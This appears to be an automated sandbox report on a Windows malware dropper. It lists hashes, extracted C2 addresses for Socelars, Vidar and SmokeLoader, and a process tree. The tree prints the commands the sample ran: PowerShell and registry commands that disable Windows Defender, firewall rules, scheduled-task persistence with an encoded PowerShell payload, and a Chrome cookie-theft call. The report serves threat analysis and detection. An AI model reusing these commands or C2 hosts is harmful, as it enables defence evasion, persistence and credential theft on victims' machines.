Analysis

  • max time kernel
    154s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20/12/2021, 14:03

General

  • Target

    42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe

  • Size

    6.7MB

  • MD5

    09627559587e099b024796e1b61fbd4c

  • SHA1

    28cab95f8d7262958b09a3a622ff14196a05d52a

  • SHA256

    42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d

  • SHA512

    b8bc5e8afa775a7878e82e6a6fea355a1c61018bdafc9967f8b136ef999490b655daa4ae551c152b7f1e092797929e17f8bfa2d6d5d89865d078d03fe91c94ae

Malware Config

Extracted

Family

socelars

C2

http://www.biohazardgraphics.com/

Extracted

Family

vidar

Version

49.1

Botnet

915

C2

https://noc.social/@sergeev46

https://c.im/@sergeev47

Attributes
  • profile_id

    915

Extracted

Family

smokeloader

Version

2020

C2

http://rcacademy.at/upload/

http://e-lanpengeonline.com/upload/

http://vjcmvz.cn/upload/

http://galala.ru/upload/

http://witra.ru/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • NirSoft WebBrowserPassView 4 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 7 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 29 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 3 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe
    "C:\Users\Admin\AppData\Local\Temp\42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3672
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4316
      • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4424
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4436
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:300
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sat1246754647.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4716
          • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe
            Sat1246754647.exe
            5⤵
            • Executes dropped EXE
            PID:2360
            • C:\Users\Admin\AppData\Local\Temp\is-KN6R9.tmp\Sat1246754647.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-KN6R9.tmp\Sat1246754647.tmp" /SL5="$5003A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:3124
              • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe
                "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe" /SILENT
                7⤵
                • Executes dropped EXE
                PID:2412
                • C:\Users\Admin\AppData\Local\Temp\is-D5NR0.tmp\Sat1246754647.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-D5NR0.tmp\Sat1246754647.tmp" /SL5="$50030,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe" /SILENT
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:4704
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sat125c6837fefc9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:520
          • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat125c6837fefc9.exe
            Sat125c6837fefc9.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2080
            • C:\Users\Admin\Pictures\Adobe Films\f385xJqohThJ_S4i9aqhmluG.exe
              "C:\Users\Admin\Pictures\Adobe Films\f385xJqohThJ_S4i9aqhmluG.exe"
              6⤵
                PID:4120
              • C:\Users\Admin\Pictures\Adobe Films\PbizHT_GiNI_OBWBgT2O7KGz.exe
                "C:\Users\Admin\Pictures\Adobe Films\PbizHT_GiNI_OBWBgT2O7KGz.exe"
                6⤵
                  PID:2160
                • C:\Users\Admin\Pictures\Adobe Films\sZ5WLF4gnGehdFz_RaGLerfr.exe
                  "C:\Users\Admin\Pictures\Adobe Films\sZ5WLF4gnGehdFz_RaGLerfr.exe"
                  6⤵
                    PID:1140
                    • C:\Users\Admin\Documents\I80SCQZWXpF_aGH7seYKqBTU.exe
                      "C:\Users\Admin\Documents\I80SCQZWXpF_aGH7seYKqBTU.exe"
                      7⤵
                        PID:5904
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                        7⤵
                        • Creates scheduled task(s)
                        PID:2304
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                        7⤵
                        • Creates scheduled task(s)
                        PID:4696
                    • C:\Users\Admin\Pictures\Adobe Films\dnEusqy0n2UlbCW2GeWfi9st.exe
                      "C:\Users\Admin\Pictures\Adobe Films\dnEusqy0n2UlbCW2GeWfi9st.exe"
                      6⤵
                        PID:5088
                      • C:\Users\Admin\Pictures\Adobe Films\IezJI9eppv8Mh8oMeW3FqRbZ.exe
                        "C:\Users\Admin\Pictures\Adobe Films\IezJI9eppv8Mh8oMeW3FqRbZ.exe"
                        6⤵
                          PID:1840
                          • C:\Users\Admin\AppData\Local\5e47281b-04e5-4cc7-8698-b5a4d9bbec6d.exe
                            "C:\Users\Admin\AppData\Local\5e47281b-04e5-4cc7-8698-b5a4d9bbec6d.exe"
                            7⤵
                              PID:6108
                            • C:\Users\Admin\AppData\Local\e3aefdc4-7104-4208-9a1d-ba637a78d7ee.exe
                              "C:\Users\Admin\AppData\Local\e3aefdc4-7104-4208-9a1d-ba637a78d7ee.exe"
                              7⤵
                                PID:2396
                              • C:\Users\Admin\AppData\Local\de1ec6cb-b27f-43f7-baed-2147d3570496.exe
                                "C:\Users\Admin\AppData\Local\de1ec6cb-b27f-43f7-baed-2147d3570496.exe"
                                7⤵
                                  PID:5276
                                • C:\Users\Admin\AppData\Local\38ce38cd-754e-47e7-beba-c87b8ceb4f2c.exe
                                  "C:\Users\Admin\AppData\Local\38ce38cd-754e-47e7-beba-c87b8ceb4f2c.exe"
                                  7⤵
                                    PID:4900
                                  • C:\Users\Admin\AppData\Local\1dcf6d84-0acf-47a1-b54c-59f9f5dedd5b.exe
                                    "C:\Users\Admin\AppData\Local\1dcf6d84-0acf-47a1-b54c-59f9f5dedd5b.exe"
                                    7⤵
                                      PID:4572
                                  • C:\Users\Admin\Pictures\Adobe Films\P25dm9wh3jR4wL3mweXvqhb9.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\P25dm9wh3jR4wL3mweXvqhb9.exe"
                                    6⤵
                                      PID:4312
                                    • C:\Users\Admin\Pictures\Adobe Films\Z3jtMs6ta7h1zfKHCA_xP81F.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\Z3jtMs6ta7h1zfKHCA_xP81F.exe"
                                      6⤵
                                        PID:2136
                                      • C:\Users\Admin\Pictures\Adobe Films\JURcYUlgBJjMvTOR5Ih9xZj6.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\JURcYUlgBJjMvTOR5Ih9xZj6.exe"
                                        6⤵
                                          PID:2128
                                        • C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe"
                                          6⤵
                                            PID:4024
                                            • C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe"
                                              7⤵
                                                PID:3224
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 24
                                                  8⤵
                                                  • Program crash
                                                  PID:2728
                                            • C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe"
                                              6⤵
                                                PID:2728
                                                • C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe"
                                                  7⤵
                                                    PID:4212
                                                • C:\Users\Admin\Pictures\Adobe Films\r7vqnR0xrf1mL8p7XP7q2N55.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\r7vqnR0xrf1mL8p7XP7q2N55.exe"
                                                  6⤵
                                                    PID:3852
                                                    • C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"
                                                      7⤵
                                                        PID:4996
                                                      • C:\Users\Admin\AppData\Local\Temp\zhangting.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\zhangting.exe"
                                                        7⤵
                                                          PID:3780
                                                          • C:\Users\Admin\AppData\Local\Temp\zhangting.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\zhangting.exe" -u
                                                            8⤵
                                                              PID:5152
                                                          • C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"
                                                            7⤵
                                                              PID:1972
                                                            • C:\Users\Admin\AppData\Local\Temp\inst.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\inst.exe"
                                                              7⤵
                                                                PID:4780
                                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                7⤵
                                                                  PID:2948
                                                                • C:\Users\Admin\AppData\Local\Temp\setup1.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\setup1.exe"
                                                                  7⤵
                                                                    PID:5200
                                                                  • C:\Users\Admin\AppData\Local\Temp\racoon.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\racoon.exe"
                                                                    7⤵
                                                                      PID:5312
                                                                    • C:\Users\Admin\AppData\Local\Temp\askhelp.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\askhelp.exe"
                                                                      7⤵
                                                                        PID:5400
                                                                      • C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
                                                                        7⤵
                                                                          PID:5724
                                                                        • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                          7⤵
                                                                            PID:5832
                                                                          • C:\Users\Admin\AppData\Local\Temp\logger.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\logger.exe"
                                                                            7⤵
                                                                              PID:5912
                                                                            • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                                              7⤵
                                                                                PID:6000
                                                                              • C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
                                                                                7⤵
                                                                                  PID:6136
                                                                                • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                                  7⤵
                                                                                    PID:720
                                                                                • C:\Users\Admin\Pictures\Adobe Films\z_dIUaHNLmGNcR2eEYUv1t5u.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\z_dIUaHNLmGNcR2eEYUv1t5u.exe"
                                                                                  6⤵
                                                                                    PID:3864
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"
                                                                                    6⤵
                                                                                      PID:4664
                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT: cLose ( CREatEObJECT ( "wSCripT.sHeLl" ).Run ( "C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """" == """" for %e In ( ""C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"" ) do taskkill /iM ""%~Nxe"" -f ", 0 , TrUe ) )
                                                                                        7⤵
                                                                                          PID:1112
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"> ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If "" == "" for %e In ( "C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe" ) do taskkill /iM "%~Nxe" -f
                                                                                            8⤵
                                                                                              PID:6124
                                                                                              • C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE
                                                                                                ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe
                                                                                                9⤵
                                                                                                  PID:360
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\03YtOE00pXvhdDtGW8neB4Ah.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\03YtOE00pXvhdDtGW8neB4Ah.exe"
                                                                                            6⤵
                                                                                              PID:4816
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\uULgUXye9012XpyfSiCgyp37.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\uULgUXye9012XpyfSiCgyp37.exe"
                                                                                              6⤵
                                                                                                PID:3184
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS98FB.tmp\Install.exe
                                                                                                  .\Install.exe
                                                                                                  7⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:4980
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSBD0D.tmp\Install.exe
                                                                                                    .\Install.exe /S /site_id "525403"
                                                                                                    8⤵
                                                                                                      PID:1928
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                        9⤵
                                                                                                          PID:5340
                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                            10⤵
                                                                                                              PID:6056
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                11⤵
                                                                                                                  PID:5524
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                              9⤵
                                                                                                                PID:5264
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                  10⤵
                                                                                                                    PID:1676
                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                      11⤵
                                                                                                                        PID:5188
                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                    9⤵
                                                                                                                      PID:2332
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                        10⤵
                                                                                                                          PID:5884
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                            11⤵
                                                                                                                              PID:2032
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                              11⤵
                                                                                                                                PID:1784
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /CREATE /TN "gbPcfYwfQ" /SC once /ST 02:55:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                            9⤵
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:5920
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /run /I /tn "gbPcfYwfQ"
                                                                                                                            9⤵
                                                                                                                              PID:32
                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\UNzIX8HBMNPNIWrpHYMyJ6ER.exe
                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\UNzIX8HBMNPNIWrpHYMyJ6ER.exe"
                                                                                                                        6⤵
                                                                                                                          PID:1620
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            7⤵
                                                                                                                              PID:2728
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              7⤵
                                                                                                                                PID:6100
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Avk2EJbFUsCIGK5bsZwiZYCd.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Avk2EJbFUsCIGK5bsZwiZYCd.exe"
                                                                                                                              6⤵
                                                                                                                                PID:3840
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                  7⤵
                                                                                                                                    PID:4484
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                                    7⤵
                                                                                                                                      PID:5396
                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                      7⤵
                                                                                                                                        PID:5792
                                                                                                                                      • C:\Windows\System\svchost.exe
                                                                                                                                        "C:\Windows\System\svchost.exe" formal
                                                                                                                                        7⤵
                                                                                                                                          PID:2156
                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                          schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                          7⤵
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:5900
                                                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                          7⤵
                                                                                                                                            PID:5348
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\gESi6jZe4XXubaqPsnZBzWnB.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\gESi6jZe4XXubaqPsnZBzWnB.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:4940
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\Y34pZCu0tloDrEzADK1GfR0B.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\Y34pZCu0tloDrEzADK1GfR0B.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:4544
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 124
                                                                                                                                                7⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:2480
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\mL_OP84SRxNpVqtwErqce4eu.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\mL_OP84SRxNpVqtwErqce4eu.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:3200
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\wVrl_RNkDhDjjzFBnSphJP3Q.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\wVrl_RNkDhDjjzFBnSphJP3Q.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:4252
                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\A6jOeaLH4C4GdpYuyL71mml1.exe
                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\A6jOeaLH4C4GdpYuyL71mml1.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:4600
                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe
                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:4476
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe" -u
                                                                                                                                                        7⤵
                                                                                                                                                          PID:5640
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sat123037f78f205c.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:588
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat123037f78f205c.exe
                                                                                                                                                      Sat123037f78f205c.exe
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:1912
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                        6⤵
                                                                                                                                                          PID:1680
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                            7⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:4264
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sat128942fc3c9a4e75.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:780
